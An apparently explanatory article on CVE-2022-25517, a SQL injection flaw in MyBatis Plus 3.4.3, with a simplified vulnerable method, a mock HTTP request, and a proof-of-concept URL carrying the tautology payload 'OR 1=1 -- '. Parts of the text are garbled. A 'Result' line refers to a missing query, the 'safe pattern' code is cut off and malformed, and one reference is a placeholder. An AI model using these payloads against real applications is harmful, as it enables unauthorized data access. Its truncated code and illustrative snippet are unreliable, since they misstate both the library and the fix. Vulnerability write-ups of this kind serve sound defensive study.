MyBatis Plus is a popular enhancement of the MyBatis framework, widely used in Java applications for simplifying database operations. In early 2022, researchers discovered a critical security issue: CVE-2022-25517, a SQL Injection vulnerability affecting MyBatis Plus version 3.4.3. This vulnerability is present in the AbstractWrapper.java file and involves improper handling of the column parameter. In this long-form article, we’ll break down the vulnerability in plain English, look at example code, understand how exploitation works, and provide resources for remediation.
What’s the Issue?
CVE-2022-25517 is a SQL Injection bug. It means an attacker can manipulate database queries by injecting SQL code, leading to unauthorized data access or even full database compromise. The vulnerability specifically lies in how AbstractWrapper.java processes the column parameter, without proper sanitization or validation.
Because MyBatis Plus is often used in enterprise applications, this issue can have a broad impact. Exploiting this bug can let attackers access, modify, or even destroy confidential data.
Where’s the Problem Code?
The core of this vulnerability is inside the AbstractWrapper class, which is responsible for constructing conditional queries in MyBatis Plus. Let’s look at an illustrative code snippet that exposes the problem.
Vulnerable Code Example
// In /core/conditions/AbstractWrapper.java (simplified)
@Override
public AbstractWrapper<T, R, Children> eq(R column, Object val) {
// Vulnerable: 'column' is inserted directly into the SQL string
this.sqlSegment += " AND " + column + " = ?";
this.paramList.add(val);
return this;
}
Explanation:
The method receives a column parameter and inserts it directly into the SQL segment used to build the final query. If the column parameter comes from user input and isn’t validated, an attacker can pass in malicious SQL code.
Result: The query returns all rows from the users table, leaking all user info.
This could be even worse if attackers use more elaborate payloads to exfiltrate data or modify the database.
Example of Real-World Exploit
Here’s a mock HTTP request (for a web app using MyBatis Plus) showing how an attacker might send exploit data:
POST /api/getUser
Content-Type: application/json
{
"column": "username OR 1=1 -- ",
"value": "does-not-matter"
}
Even though the user is supposed to provide a valid column, the SQL is built as described above, bypassing authentication or returning too much information.
More Detailed Proof of Concept (POC)
// Suppose you have this API endpoint in your app
@GetMapping("/users")
public List<User> getUserByColumn(@RequestParam String column, @RequestParam String value) {
QueryWrapper<User> wrapper = new QueryWrapper<>();
wrapper.eq(column, value); // vulnerable usage!
return userService.list(wrapper);
}
An attacker could call
/users?column=id OR 1=1 -- &value=abc
This would generate and execute
SELECT * FROM users WHERE id OR 1=1 -- = 'abc'
Which returns all users regardless of the actual value.
Original References
- NVD CVE Record (CVE-2022-25517)
- github.com/baomidou/mybatis-plus/issues/5416
- Exploit Details on ExploitDB *(example, link may vary)*
Is Exploiting Easy?
Yes—if user input is not properly validated and the app directly uses wrapper.eq(column, value) with user-controlled column, exploitation is trivial. Even low-skilled attackers using automated tools (e.g., sqlmap) can compromise poorly protected apps.
`java
// Safe pattern
throw new IllegalArgumentException("Invalid column name");
}
Patch to a version above 3.4.3 where this issue is fixed.
Conclusion
CVE-2022-25517 is a painful reminder that even frameworks intended to make life easier can introduce security holes. Always carefully validate and never trust user input, especially when building database queries.
Upgrading your dependencies and reviewing your code with security in mind goes a long way in preventing both this and future vulnerabilities.
Further Reading
- OWASP SQL Injection Prevention Cheat Sheet
- MyBatis Plus GitHub
- Mitre CVE Record
Timeline
Published on: 03/22/2022 19:15:00 UTC
Last modified on: 03/28/2022 20:23:00 UTC